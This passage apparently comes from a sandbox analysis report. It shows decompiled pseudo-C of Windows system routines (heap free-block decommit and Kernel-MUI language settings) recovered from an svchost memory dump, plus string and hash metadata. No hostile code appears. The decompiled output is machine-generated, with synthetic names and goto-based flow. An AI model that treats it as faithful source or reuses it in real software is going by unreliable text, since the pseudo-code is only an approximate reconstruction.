                        					L7:
                        					return _t246;
                        				}
                        				if(_a8 != 0) {
                        					__eflags =  *(__edx + 2) & 0x00000008;
                        					if(( *(__edx + 2) & 0x00000008) != 0) {
                        						 *((intOrPtr*)(__ecx + 0x230)) =  *((intOrPtr*)(__ecx + 0x230)) - 1;
                        						_t430 = E0304DF24(__edx,  &_v12,  &_v16);
                        						__eflags = _t430;
                        						if(_t430 != 0) {
                        							_t157 = _t553 + 0x234;
                        							 *_t157 =  *(_t553 + 0x234) - _v16;
                        							__eflags =  *_t157;
                        						}
                        					}
                        					_t445 = _a4;
                        					_t514 = _t539;
                        					_v48 = _t539;
                        					L14:
                        					_t247 =  *((intOrPtr*)(_t539 + 6));
                        					__eflags = _t247;
                        					if(_t247 == 0) {
                        						_t541 = _t553;
                        					} else {
                        						_t541 = (_t539 & 0xffff0000) - ((_t247 & 0x000000ff) << 0x10) + 0x10000;
                        						__eflags = _t541;
                        					}
                        					_t249 = 7 + _t445 * 8 + _t514;
                        					_v12 = _t249;
                        					__eflags =  *_t249 - 3;
                        					if( *_t249 == 3) {
                        						_v16 = _t514 + _t445 * 8 + 8;
                        						E03029373(_t553, _t514 + _t445 * 8 + 8);
                        						_t452 = _v16;
                        						_v28 =  *(_t452 + 0x10);
                        						 *((intOrPtr*)(_t541 + 0x30)) =  *((intOrPtr*)(_t541 + 0x30)) - 1;
                        						_v36 =  *(_t452 + 0x14);
                        						 *((intOrPtr*)(_t541 + 0x2c)) =  *((intOrPtr*)(_t541 + 0x2c)) - ( *(_t452 + 0x14) >> 0xc);
                        						 *((intOrPtr*)(_t553 + 0x1e8)) =  *((intOrPtr*)(_t553 + 0x1e8)) +  *(_t452 + 0x14);
                        						 *((intOrPtr*)(_t553 + 0x1f8)) =  *((intOrPtr*)(_t553 + 0x1f8)) - 1;
                        						_t256 =  *(_t452 + 0x14);
                        						__eflags = _t256 - 0x7f000;
                        						if(_t256 >= 0x7f000) {
                        							_t142 = _t553 + 0x1ec;
                        							 *_t142 =  *(_t553 + 0x1ec) - _t256;
                        							__eflags =  *_t142;
                        							_t256 =  *(_t452 + 0x14);
                        						}
                        						_t513 = _v48;
                        						_t445 = _t445 + (_t256 >> 3) + 0x20;
                        						_a4 = _t445;
                        						_v40 = 1;
                        					} else {
                        						_t27 =  &_v36;
                        						 *_t27 = _v36 & 0x00000000;
                        						__eflags =  *_t27;
                        					}
                        					__eflags =  *((intOrPtr*)(_t553 + 0x54)) -  *((intOrPtr*)(_t513 + 4));
                        					if( *((intOrPtr*)(_t553 + 0x54)) ==  *((intOrPtr*)(_t513 + 4))) {
                        						_v44 = _t513;
                        						_t262 = E0302A9EF(_t541, _t513);
                        						__eflags = _a8;
                        						_v32 = _t262;
                        						if(_a8 != 0) {
                        							__eflags = _t262;
                        							if(_t262 == 0) {
                        								goto L19;
                        							}
                        						}
                        						__eflags =  *0x3118748 - 1;
                        						if( *0x3118748 >= 1) {
                        							__eflags = _t262;
                        							if(_t262 == 0) {
                        								_t415 =  *[fs:0x30];
                        								__eflags =  *(_t415 + 0xc);
                        								if( *(_t415 + 0xc) == 0) {
                        									_push("HEAP: ");
                        									E0302B150();
                        								} else {
                        									E0302B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                        								}
                        								_push("(UCRBlock != NULL)");
                        								E0302B150();
                        								__eflags =  *0x3117bc8;
                        								if( *0x3117bc8 == 0) {
                        									__eflags = 1;
                        									E030E2073(_t445, 1, _t541, 1);
                        								}
                        								_t513 = _v48;
                        								_t445 = _a4;
                        							}
                        						}
                        						_t350 = _v40;
                        						_t480 = _t445 << 3;
                        						_v20 = _t480;
                        						_t481 = _t480 + _t513;
                        						_v24 = _t481;
                        						__eflags = _t350;
                        						if(_t350 == 0) {
                        							_t481 = _t481 + 0xfffffff0;
                        							__eflags = _t481;
                        						}
                        						_t483 = (_t481 & 0xfffff000) - _v44;
                        						__eflags = _t483;
                        						_v52 = _t483;
                        						if(_t483 == 0) {
                        							__eflags =  *0x3118748 - 1;
                        							if( *0x3118748 < 1) {
                        								goto L9;
                        							}
                        							__eflags = _t350;
                        							goto L146;
                        						} else {
                        							_t352 = E0305174B( &_v44,  &_v52, 0x4000);
                        							__eflags = _t352;
                        							if(_t352 < 0) {
                        								goto L94;
                        							}
                        							_t353 = E03047D50();
                        							_t447 = 0x7ffe0380;
                        							__eflags = _t353;
                        							if(_t353 != 0) {
                        								_t356 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                        							} else {
                        								_t356 = 0x7ffe0380;
                        							}
                        							__eflags =  *_t356;
                        							if( *_t356 != 0) {
                        								_t357 =  *[fs:0x30];
                        								__eflags =  *(_t357 + 0x240) & 0x00000001;
                        								if(( *(_t357 + 0x240) & 0x00000001) != 0) {
                        									E030E14FB(_t447, _t553, _v44, _v52, 5);
                        								}
                        							}
                        							_t358 = _v32;
                        							 *((intOrPtr*)(_t553 + 0x200)) =  *((intOrPtr*)(_t553 + 0x200)) + 1;
                        							_t484 =  *((intOrPtr*)(_v32 + 0x14));
                        							__eflags = _t484 - 0x7f000;
                        							if(_t484 >= 0x7f000) {
                        								_t90 = _t553 + 0x1ec;
                        								 *_t90 =  *(_t553 + 0x1ec) - _t484;
                        								__eflags =  *_t90;
                        							}
                        							E03029373(_t553, _t358);
                        							_t486 = _v32;
                        							 *((intOrPtr*)(_v32 + 0x14)) =  *((intOrPtr*)(_v32 + 0x14)) + _v52;
                        							E03029819(_t486);
                        							 *((intOrPtr*)(_t541 + 0x2c)) =  *((intOrPtr*)(_t541 + 0x2c)) + (_v52 >> 0xc);
                        							 *((intOrPtr*)(_t553 + 0x1e8)) =  *((intOrPtr*)(_t553 + 0x1e8)) - _v52;
                        							_t366 =  *((intOrPtr*)(_v32 + 0x14));
                        							__eflags = _t366 - 0x7f000;
                        							if(_t366 >= 0x7f000) {
                        								_t104 = _t553 + 0x1ec;
                        								 *_t104 =  *(_t553 + 0x1ec) + _t366;
                        								__eflags =  *_t104;
                        							}
                        							__eflags = _v40;
                        							if(_v40 == 0) {
                        								_t533 = _v52 + _v44;
                        								_v32 = _t533;
                        								_t533[2] =  *((intOrPtr*)(_t553 + 0x54));
                        								__eflags = _v24 - _v52 + _v44;
                        								if(_v24 == _v52 + _v44) {
                        									__eflags =  *(_t553 + 0x4c);
                        									if( *(_t553 + 0x4c) != 0) {
                        										_t533[1] = _t533[1] ^ _t533[0] ^  *_t533;
                        										 *_t533 =  *_t533 ^  *(_t553 + 0x50);
                        									}
                        								} else {
                        									_t449 = 0;
                        									_t533[3] = 0;
                        									_t533[1] = 0;
                        									_t394 = _v20 - _v52 >> 0x00000003 & 0x0000ffff;
                        									_t491 = _t394;
                        									 *_t533 = _t394;
                        									__eflags =  *0x3118748 - 1; // 0x0
                        									if(__eflags >= 0) {
                        										__eflags = _t491 - 1;
                        										if(_t491 <= 1) {
                        											_t404 =  *[fs:0x30];
                        											__eflags =  *(_t404 + 0xc);
                        											if( *(_t404 + 0xc) == 0) {
                        												_push("HEAP: ");
                        												E0302B150();
                        											} else {
                        												E0302B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                        											}
                        											_push("((LONG)FreeEntry->Size > 1)");
                        											E0302B150();
                        											_pop(_t491);
                        											__eflags =  *0x3117bc8 - _t449; // 0x0
                        											if(__eflags == 0) {
                        												__eflags = 0;
                        												_t491 = 1;
                        												E030E2073(_t449, 1, _t541, 0);
                        											}
                        											_t533 = _v32;
                        										}
                        									}
                        									_t533[1] = _t449;
                        									__eflags =  *((intOrPtr*)(_t541 + 0x18)) - _t541;
                        									if( *((intOrPtr*)(_t541 + 0x18)) != _t541) {
                        										_t402 = (_t533 - _t541 >> 0x10) + 1;
                        										_v16 = _t402;
                        										__eflags = _t402 - 0xfe;
                        										if(_t402 >= 0xfe) {
                        											_push(_t491);
                        											_push(_t449);
                        											E030EA80D( *((intOrPtr*)(_t541 + 0x18)), 3, _t533, _t541);
                        											_t533 = _v48;
                        											_t402 = _v32;
                        										}
                        										_t449 = _t402;
                        									}
                        									_t533[3] = _t449;
                        									E0304A830(_t553, _t533,  *_t533 & 0x0000ffff);
                        									_t447 = 0x7ffe0380;
                        								}
                        							}
                        							_t367 = E03047D50();
                        							__eflags = _t367;
                        							if(_t367 != 0) {
                        								_t370 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                        							} else {
                        								_t370 = _t447;
                        							}
                        							__eflags =  *_t370;
                        							if( *_t370 != 0) {
                        								_t371 =  *[fs:0x30];
                        								__eflags =  *(_t371 + 0x240) & 1;
                        								if(( *(_t371 + 0x240) & 1) != 0) {
                        									__eflags = E03047D50();
                        									if(__eflags != 0) {
                        										_t447 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                        										__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                        									}
                        									E030E1411(_t447, _t553, _v44, __eflags, _v52,  *(_t553 + 0x74) << 3, _v40, _v36,  *_t447 & 0x000000ff);
                        								}
                        							}
                        							_t372 = E03047D50();
                        							_t546 = 0x7ffe038a;
                        							_t446 = 0x230;
                        							__eflags = _t372;
                        							if(_t372 != 0) {
                        								_t246 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                        							} else {
                        								_t246 = 0x7ffe038a;
                        							}
                        							__eflags =  *_t246;
                        							if( *_t246 == 0) {
                        								goto L7;
                        							} else {
                        								__eflags = E03047D50();
                        								if(__eflags != 0) {
                        									_t546 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + _t446;
                        									__eflags = _t546;
                        								}
                        								_push( *_t546 & 0x000000ff);
                        								_push(_v36);
                        								_push(_v40);
                        								goto L120;
                        							}
                        						}
                        					} else {
                        						L19:
                        						_t31 = _t513 + 0x101f; // 0x101f
                        						_t455 = _t31 & 0xfffff000;
                        						_t32 = _t513 + 0x28; // 0x28
                        						_v44 = _t455;
                        						__eflags = _t455 - _t32;
                        						if(_t455 == _t32) {
                        							_t455 = _t455 + 0x1000;
                        							_v44 = _t455;
                        						}
                        						_t265 = _t445 << 3;
                        						_v24 = _t265;
                        						_t266 = _t265 + _t513;
                        						__eflags = _v40;
                        						_v20 = _t266;
                        						if(_v40 == 0) {
                        							_t266 = _t266 + 0xfffffff0;
                        							__eflags = _t266;
                        						}
                        						_t267 = _t266 & 0xfffff000;
                        						_v52 = _t267;
                        						__eflags = _t267 - _t455;
                        						if(_t267 < _t455) {
                        							__eflags =  *0x3118748 - 1; // 0x0
                        							if(__eflags < 0) {
                        								L9:
                        								_t450 = _t553;
                        								L10:
                        								_push(_t445);
                        								goto L11;
                        							}
                        							__eflags = _v40;
                        							L146:
                        							if(__eflags == 0) {
                        								goto L9;
                        							}
                        							_t270 =  *[fs:0x30];
                        							__eflags =  *(_t270 + 0xc);
                        							if( *(_t270 + 0xc) == 0) {
                        								_push("HEAP: ");
                        								E0302B150();
                        							} else {
                        								E0302B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                        							}
                        							_push("(!TrailingUCR)");
                        							E0302B150();
                        							__eflags =  *0x3117bc8;
                        							if( *0x3117bc8 == 0) {
                        								__eflags = 0;
                        								E030E2073(_t445, 1, _t541, 0);
                        							}
                        							L152:
                        							_t445 = _a4;
                        							L153:
                        							_t513 = _v48;
                        							goto L9;
                        						}
                        						_v32 = _t267;
                        						_t280 = _t267 - _t455;
                        						_v32 = _v32 - _t455;
                        						__eflags = _a8;
                        						_t460 = _v32;
                        						_v52 = _t460;
                        						if(_a8 != 0) {
                        							L27:
                        							__eflags = _t280;
                        							if(_t280 == 0) {
                        								L33:
                        								_t446 = 0;
                        								__eflags = _v40;
                        								if(_v40 == 0) {
                        									_t468 = _v44 + _v52;
                        									_v36 = _t468;
                        									_t468[2] =  *((intOrPtr*)(_t553 + 0x54));
                        									__eflags = _v20 - _v52 + _v44;
                        									if(_v20 == _v52 + _v44) {
                        										__eflags =  *(_t553 + 0x4c);
                        										if( *(_t553 + 0x4c) != 0) {
                        											_t468[1] = _t468[1] ^ _t468[0] ^  *_t468;
                        											 *_t468 =  *_t468 ^  *(_t553 + 0x50);
                        										}
                        									} else {
                        										_t468[3] = 0;
                        										_t468[1] = 0;
                        										_t317 = _v24 - _v52 - _v44 + _t513 >> 0x00000003 & 0x0000ffff;
                        										_t521 = _t317;
                        										 *_t468 = _t317;
                        										__eflags =  *0x3118748 - 1; // 0x0
                        										if(__eflags >= 0) {
                        											__eflags = _t521 - 1;
                        											if(_t521 <= 1) {
                        												_t327 =  *[fs:0x30];
                        												__eflags =  *(_t327 + 0xc);
                        												if( *(_t327 + 0xc) == 0) {
                        													_push("HEAP: ");
                        													E0302B150();
                        												} else {
                        													E0302B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                        												}
                        												_push("(LONG)FreeEntry->Size > 1");
                        												E0302B150();
                        												__eflags =  *0x3117bc8 - _t446; // 0x0
                        												if(__eflags == 0) {
                        													__eflags = 1;
                        													E030E2073(_t446, 1, _t541, 1);
                        												}
                        												_t468 = _v36;
                        											}
                        										}
                        										_t468[1] = _t446;
                        										_t522 =  *((intOrPtr*)(_t541 + 0x18));
                        										__eflags =  *((intOrPtr*)(_t541 + 0x18)) - _t541;
                        										if( *((intOrPtr*)(_t541 + 0x18)) == _t541) {
                        											_t320 = _t446;
                        										} else {
                        											_t320 = (_t468 - _t541 >> 0x10) + 1;
                        											_v12 = _t320;
                        											__eflags = _t320 - 0xfe;
                        											if(_t320 >= 0xfe) {
                        												_push(_t468);
                        												_push(_t446);
                        												E030EA80D(_t522, 3, _t468, _t541);
                        												_t468 = _v52;
                        												_t320 = _v28;
                        											}
                        										}
                        										_t468[3] = _t320;
                        										E0304A830(_t553, _t468,  *_t468 & 0x0000ffff);
                        									}
                        								}
                        								E0304B73D(_t553, _t541, _v44 + 0xffffffe8, _v52, _v48,  &_v8);
                        								E0304A830(_t553, _v64, _v24);
                        								_t286 = E03047D50();
                        								_t542 = 0x7ffe0380;
                        								__eflags = _t286;
                        								if(_t286 != 0) {
                        									_t289 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                        								} else {
                        									_t289 = 0x7ffe0380;
                        								}
                        								__eflags =  *_t289;
                        								if( *_t289 != 0) {
                        									_t290 =  *[fs:0x30];
                        									__eflags =  *(_t290 + 0x240) & 1;
                        									if(( *(_t290 + 0x240) & 1) != 0) {
                        										__eflags = E03047D50();
                        										if(__eflags != 0) {
                        											_t542 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                        											__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                        										}
                        										E030E1411(_t446, _t553, _v44, __eflags, _v52,  *(_t553 + 0x74) << 3, _t446, _t446,  *_t542 & 0x000000ff);
                        									}
                        								}
                        								_t291 = E03047D50();
                        								_t543 = 0x7ffe038a;
                        								__eflags = _t291;
                        								if(_t291 != 0) {
                        									_t246 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                        								} else {
                        									_t246 = 0x7ffe038a;
                        								}
                        								__eflags =  *_t246;
                        								if( *_t246 != 0) {
                        									__eflags = E03047D50();
                        									if(__eflags != 0) {
                        										_t543 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                        										__eflags = _t543;
                        									}
                        									_push( *_t543 & 0x000000ff);
                        									_push(_t446);
                        									_push(_t446);
                        									L120:
                        									_push( *(_t553 + 0x74) << 3);
                        									_push(_v52);
                        									_t246 = E030E1411(_t446, _t553, _v44, __eflags);
                        								}
                        								goto L7;
                        							}
                        							 *((intOrPtr*)(_t553 + 0x200)) =  *((intOrPtr*)(_t553 + 0x200)) + 1;
                        							_t339 = E0305174B( &_v44,  &_v52, 0x4000);
                        							__eflags = _t339;
                        							if(_t339 < 0) {
                        								L94:
                        								 *((intOrPtr*)(_t553 + 0x210)) =  *((intOrPtr*)(_t553 + 0x210)) + 1;
                        								__eflags = _v40;
                        								if(_v40 == 0) {
                        									goto L153;
                        								}
                        								E0304B73D(_t553, _t541, _v28 + 0xffffffe8, _v36, _v48,  &_a4);
                        								goto L152;
                        							}
                        							_t344 = E03047D50();
                        							__eflags = _t344;
                        							if(_t344 != 0) {
                        								_t347 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                        							} else {
                        								_t347 = 0x7ffe0380;
                        							}
                        							__eflags =  *_t347;
                        							if( *_t347 != 0) {
                        								_t348 =  *[fs:0x30];
                        								__eflags =  *(_t348 + 0x240) & 1;
                        								if(( *(_t348 + 0x240) & 1) != 0) {
                        									E030E14FB(_t445, _t553, _v44, _v52, 6);
                        								}
                        							}
                        							_t513 = _v48;
                        							goto L33;
                        						}
                        						__eflags =  *_v12 - 3;
                        						_t513 = _v48;
                        						if( *_v12 == 3) {
                        							goto L27;
                        						}
                        						__eflags = _t460;
                        						if(_t460 == 0) {
                        							goto L9;
                        						}
                        						__eflags = _t460 -  *((intOrPtr*)(_t553 + 0x6c));
                        						if(_t460 <  *((intOrPtr*)(_t553 + 0x6c))) {
                        							goto L9;
                        						}
                        						goto L27;
                        					}
                        				}
                        				_t445 = _a4;
                        				if(_t445 <  *((intOrPtr*)(__ecx + 0x6c))) {
                        					_t513 = __edx;
                        					goto L10;
                        				}
                        				_t433 =  *((intOrPtr*)(__ecx + 0x74)) + _t445;
                        				_v20 = _t433;
                        				if(_t433 <  *((intOrPtr*)(__ecx + 0x70)) || _v20 <  *(__ecx + 0x1e8) >>  *((intOrPtr*)(__ecx + 0x240)) + 3) {
                        					_t513 = _t539;
                        					goto L9;
                        				} else {
                        					_t437 = E030499BF(__ecx, __edx,  &_a4, 0);
                        					_t445 = _a4;
                        					_t514 = _t437;
                        					_v56 = _t514;
                        					if(_t445 - 0x201 > 0xfbff) {
                        						goto L14;
                        					} else {
                        						E0304A830(__ecx, _t514, _t445);
                        						_t506 =  *(_t553 + 0x238);
                        						_t551 =  *((intOrPtr*)(_t553 + 0x1e8)) - ( *(_t553 + 0x74) << 3);
                        						_t246 = _t506 >> 4;
                        						if(_t551 < _t506 - _t246) {
                        							_t508 =  *(_t553 + 0x23c);
                        							_t246 = _t508 >> 2;
                        							__eflags = _t551 - _t508 - _t246;
                        							if(_t551 > _t508 - _t246) {
                        								_t246 = E0305ABD8(_t553);
                        								 *(_t553 + 0x23c) = _t551;
                        								 *(_t553 + 0x238) = _t551;
                        							}
                        						}
                        						goto L7;
                        					}
                        				}
                        			}


                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                        • API String ID: 0-523794902
                        • Opcode ID: 909d7cbcc1b215477614d52ccde0d67a45bacf0fdf90d9e266c4a6fe25d73bf7
                        • Instruction ID: 0c77d0c07d5fed361e8bb5b6bac6a73e339a87b932842bbf28faef56b90bd922
                        • Opcode Fuzzy Hash: 909d7cbcc1b215477614d52ccde0d67a45bacf0fdf90d9e266c4a6fe25d73bf7
                        • Instruction Fuzzy Hash: FD4202B57063419FDB14DF28C484B6ABBE9FF88604F08496EF8868B352D734DA81CB51
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 96%
                        			E03033D34(signed int* __ecx) {
                        				signed int* _v8;
                        				char _v12;
                        				signed int* _v16;
                        				signed int* _v20;
                        				char _v24;
                        				signed int _v28;
                        				signed int _v32;
                        				char _v36;
                        				signed int _v40;
                        				signed int _v44;
                        				signed int* _v48;
                        				signed int* _v52;
                        				signed int _v56;
                        				signed int _v60;
                        				char _v68;
                        				signed int _t140;
                        				signed int _t161;
                        				signed int* _t236;
                        				signed int* _t242;
                        				signed int* _t243;
                        				signed int* _t244;
                        				signed int* _t245;
                        				signed int _t255;
                        				void* _t257;
                        				signed int _t260;
                        				void* _t262;
                        				signed int _t264;
                        				void* _t267;
                        				signed int _t275;
                        				signed int* _t276;
                        				short* _t277;
                        				signed int* _t278;
                        				signed int* _t279;
                        				signed int* _t280;
                        				short* _t281;
                        				signed int* _t282;
                        				short* _t283;
                        				signed int* _t284;
                        				void* _t285;
                        
                        				_v60 = _v60 | 0xffffffff;
                        				_t280 = 0;
                        				_t242 = __ecx;
                        				_v52 = __ecx;
                        				_v8 = 0;
                        				_v20 = 0;
                        				_v40 = 0;
                        				_v28 = 0;
                        				_v32 = 0;
                        				_v44 = 0;
                        				_v56 = 0;
                        				_t275 = 0;
                        				_v16 = 0;
                        				if(__ecx == 0) {
                        					_t280 = 0xc000000d;
                        					_t140 = 0;
                        					L50:
                        					 *_t242 =  *_t242 | 0x00000800;
                        					_t242[0x13] = _t140;
                        					_t242[0x16] = _v40;
                        					_t242[0x18] = _v28;
                        					_t242[0x14] = _v32;
                        					_t242[0x17] = _t275;
                        					_t242[0x15] = _v44;
                        					_t242[0x11] = _v56;
                        					_t242[0x12] = _v60;
                        					return _t280;
                        				}
                        				if(E03031B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
                        					_v56 = 1;
                        					if(_v8 != 0) {
                        						L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
                        					}
                        					_v8 = _t280;
                        				}
                        				if(E03031B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
                        					_v60 =  *_v8;
                        					L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
                        					_v8 = _t280;
                        				}
                        				if(E03031B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
                        					L16:
                        					if(E03031B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
                        						L28:
                        						if(E03031B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
                        							L46:
                        							_t275 = _v16;
                        							L47:
                        							_t161 = 0;
                        							L48:
                        							if(_v8 != 0) {
                        								L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
                        							}
                        							_t140 = _v20;
                        							if(_t140 != 0) {
                        								if(_t275 != 0) {
                        									L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
                        									_t275 = 0;
                        									_v28 = 0;
                        									_t140 = _v20;
                        								}
                        							}
                        							goto L50;
                        						}
                        						_t167 = _v12;
                        						_t255 = _v12 + 4;
                        						_v44 = _t255;
                        						if(_t255 == 0) {
                        							_t276 = _t280;
                        							_v32 = _t280;
                        						} else {
                        							_t276 = L03044620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
                        							_t167 = _v12;
                        							_v32 = _t276;
                        						}
                        						if(_t276 == 0) {
                        							_v44 = _t280;
                        							_t280 = 0xc0000017;
                        							goto L46;
                        						} else {
                        							E0306F3E0(_t276, _v8, _t167);
                        							_v48 = _t276;
                        							_t277 = E03071370(_t276, 0x3004e90);
                        							_pop(_t257);
                        							if(_t277 == 0) {
                        								L38:
                        								_t170 = _v48;
                        								if( *_v48 != 0) {
                        									E0306BB40(0,  &_v68, _t170);
                        									if(L030343C0( &_v68,  &_v24) != 0) {
                        										_t280 =  &(_t280[0]);
                        									}
                        								}
                        								if(_t280 == 0) {
                        									_t280 = 0;
                        									L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
                        									_v44 = 0;
                        									_v32 = 0;
                        								} else {
                        									_t280 = 0;
                        								}
                        								_t174 = _v8;
                        								if(_v8 != 0) {
                        									L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
                        								}
                        								_v8 = _t280;
                        								goto L46;
                        							}
                        							_t243 = _v48;
                        							do {
                        								 *_t277 = 0;
                        								_t278 = _t277 + 2;
                        								E0306BB40(_t257,  &_v68, _t243);
                        								if(L030343C0( &_v68,  &_v24) != 0) {
                        									_t280 =  &(_t280[0]);
                        								}
                        								_t243 = _t278;
                        								_t277 = E03071370(_t278, 0x3004e90);
                        								_pop(_t257);
                        							} while (_t277 != 0);
                        							_v48 = _t243;
                        							_t242 = _v52;
                        							goto L38;
                        						}
                        					}
                        					_t191 = _v12;
                        					_t260 = _v12 + 4;
                        					_v28 = _t260;
                        					if(_t260 == 0) {
                        						_t275 = _t280;
                        						_v16 = _t280;
                        					} else {
                        						_t275 = L03044620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
                        						_t191 = _v12;
                        						_v16 = _t275;
                        					}
                        					if(_t275 == 0) {
                        						_v28 = _t280;
                        						_t280 = 0xc0000017;
                        						goto L47;
                        					} else {
                        						E0306F3E0(_t275, _v8, _t191);
                        						_t285 = _t285 + 0xc;
                        						_v48 = _t275;
                        						_t279 = _t280;
                        						_t281 = E03071370(_v16, 0x3004e90);
                        						_pop(_t262);
                        						if(_t281 != 0) {
                        							_t244 = _v48;
                        							do {
                        								 *_t281 = 0;
                        								_t282 = _t281 + 2;
                        								E0306BB40(_t262,  &_v68, _t244);
                        								if(L030343C0( &_v68,  &_v24) != 0) {
                        									_t279 =  &(_t279[0]);
                        								}
                        								_t244 = _t282;
                        								_t281 = E03071370(_t282, 0x3004e90);
                        								_pop(_t262);
                        							} while (_t281 != 0);
                        							_v48 = _t244;
                        							_t242 = _v52;
                        						}
                        						_t201 = _v48;
                        						_t280 = 0;
                        						if( *_v48 != 0) {
                        							E0306BB40(_t262,  &_v68, _t201);
                        							if(L030343C0( &_v68,  &_v24) != 0) {
                        								_t279 =  &(_t279[0]);
                        							}
                        						}
                        						if(_t279 == 0) {
                        							L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
                        							_v28 = _t280;
                        							_v16 = _t280;
                        						}
                        						_t202 = _v8;
                        						if(_v8 != 0) {
                        							L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
                        						}
                        						_v8 = _t280;
                        						goto L28;
                        					}
                        				}
                        				_t214 = _v12;
                        				_t264 = _v12 + 4;
                        				_v40 = _t264;
                        				if(_t264 == 0) {
                        					_v20 = _t280;
                        				} else {
                        					_t236 = L03044620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
                        					_t280 = _t236;
                        					_v20 = _t236;
                        					_t214 = _v12;
                        				}
                        				if(_t280 == 0) {
                        					_t161 = 0;
                        					_t280 = 0xc0000017;
                        					_v40 = 0;
                        					goto L48;
                        				} else {
                        					E0306F3E0(_t280, _v8, _t214);
                        					_t285 = _t285 + 0xc;
                        					_v48 = _t280;
                        					_t283 = E03071370(_t280, 0x3004e90);
                        					_pop(_t267);
                        					if(_t283 != 0) {
                        						_t245 = _v48;
                        						do {
                        							 *_t283 = 0;
                        							_t284 = _t283 + 2;
                        							E0306BB40(_t267,  &_v68, _t245);
                        							if(L030343C0( &_v68,  &_v24) != 0) {
                        								_t275 = _t275 + 1;
                        							}
                        							_t245 = _t284;
                        							_t283 = E03071370(_t284, 0x3004e90);
                        							_pop(_t267);
                        						} while (_t283 != 0);
                        						_v48 = _t245;
                        						_t242 = _v52;
                        					}
                        					_t224 = _v48;
                        					_t280 = 0;
                        					if( *_v48 != 0) {
                        						E0306BB40(_t267,  &_v68, _t224);
                        						if(L030343C0( &_v68,  &_v24) != 0) {
                        							_t275 = _t275 + 1;
                        						}
                        					}
                        					if(_t275 == 0) {
                        						L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
                        						_v40 = _t280;
                        						_v20 = _t280;
                        					}
                        					_t225 = _v8;
                        					if(_v8 != 0) {
                        						L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
                        					}
                        					_v8 = _t280;
                        					goto L16;
                        				}
                        			}

                        Strings
                        • Kernel-MUI-Language-Allowed, xrefs: 03033DC0
                        • Kernel-MUI-Language-Disallowed, xrefs: 03033E97
                        • WindowsExcludedProcs, xrefs: 03033D6F
                        • Kernel-MUI-Number-Allowed, xrefs: 03033D8C
                        • Kernel-MUI-Language-SKU, xrefs: 03033F70
                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                        • API String ID: 0-258546922
                        • Opcode ID: dfd09d35d32deed8f9ec286a2253d2a85b5f6706f8a7704868508860fa040669
                        • Instruction ID: e965e0a7ee6ae568d3de6438658013cbb60ffcbe0da465599c370a1c2c0d9f65
